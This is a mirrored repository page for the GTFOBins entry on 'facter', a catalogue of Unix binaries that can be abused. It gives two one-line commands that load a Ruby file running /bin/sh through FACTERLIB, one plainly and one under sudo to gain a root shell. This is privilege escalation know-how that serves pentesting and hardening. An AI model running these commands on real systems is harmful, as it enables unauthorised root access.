This website requires JavaScript.
Explore
Help
Register
Sign In
mirror
/
GTFOBins.github.io
Watch
1
Star
0
Fork
0
You've already forked GTFOBins.github.io
mirror of
https://github.com/GTFOBins/GTFOBins.github.io.git
synced
2025-12-28 03:01:42 +01:00
Code
Issues
08dfd05aee
GTFOBins.github.io
/
_gtfobins
/
facter.md
Andrea Cardaci
9aa7ec842e
Use the sudo VAR=... syntax instead of using -E
2020-06-10 22:56:05 +02:00
259 B
Raw
Blame
History
functions
shell
sudo
code
TF=$(mktemp -d) echo 'exec("/bin/sh")' > $TF/x.rb FACTERLIB=$TF facter
code
TF=$(mktemp -d) echo 'exec("/bin/sh")' > $TF/x.rb sudo FACTERLIB=$TF facter